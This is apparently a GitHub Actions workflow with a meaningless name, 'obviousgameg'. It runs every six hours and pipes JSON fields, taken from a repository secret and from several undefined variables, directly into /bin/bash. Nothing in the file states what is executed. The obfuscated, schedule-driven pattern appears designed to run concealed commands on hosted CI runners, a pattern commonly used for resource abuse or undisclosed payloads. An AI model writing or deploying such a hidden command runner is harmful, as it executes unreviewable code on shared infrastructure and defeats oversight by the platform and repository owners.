name: obviousgameg
on:
  workflow_dispatch:
  schedule:
    - cron: '22 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: obviousgameg
        env:
          d9: ${{ secrets.d9 }}
        run: |
          echo $d9 | jq -r .a83 | /bin/bash
          echo $y175 | jq -r .j28096 | /bin/bash
          echo $pycqw1768 | jq -r .ydp3448 | /bin/bash
          echo $y9 | jq -r .hvfm8254 | /bin/bash
          echo $dpx8948 | jq -r .tucn09493 | /bin/bash

